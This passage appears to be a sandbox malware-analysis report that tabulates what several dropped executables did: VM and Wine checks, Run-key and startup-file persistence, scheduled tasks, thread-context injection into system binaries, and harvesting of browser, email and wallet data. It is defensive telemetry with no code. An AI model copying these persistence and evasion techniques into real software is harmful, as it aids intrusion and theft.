| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\gmwu\wtrpqgw.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\ProgramData\gmwu\wtrpqgw.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\035c4d64c6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107920101\\035c4d64c6.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a6f3c10671.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107930101\\a6f3c10671.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\99878a5969.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\99878a5969.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\xLUFfgfR\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4abf414f45.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107910101\\4abf414f45.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3836 set thread context of 428 | N/A | C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe | C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe |
| PID 3368 set thread context of 4384 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\notepad.exe |
| PID 1820 set thread context of 4408 | N/A | C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2856 set thread context of 2416 | N/A | C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\gmwu\wtrpqgw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
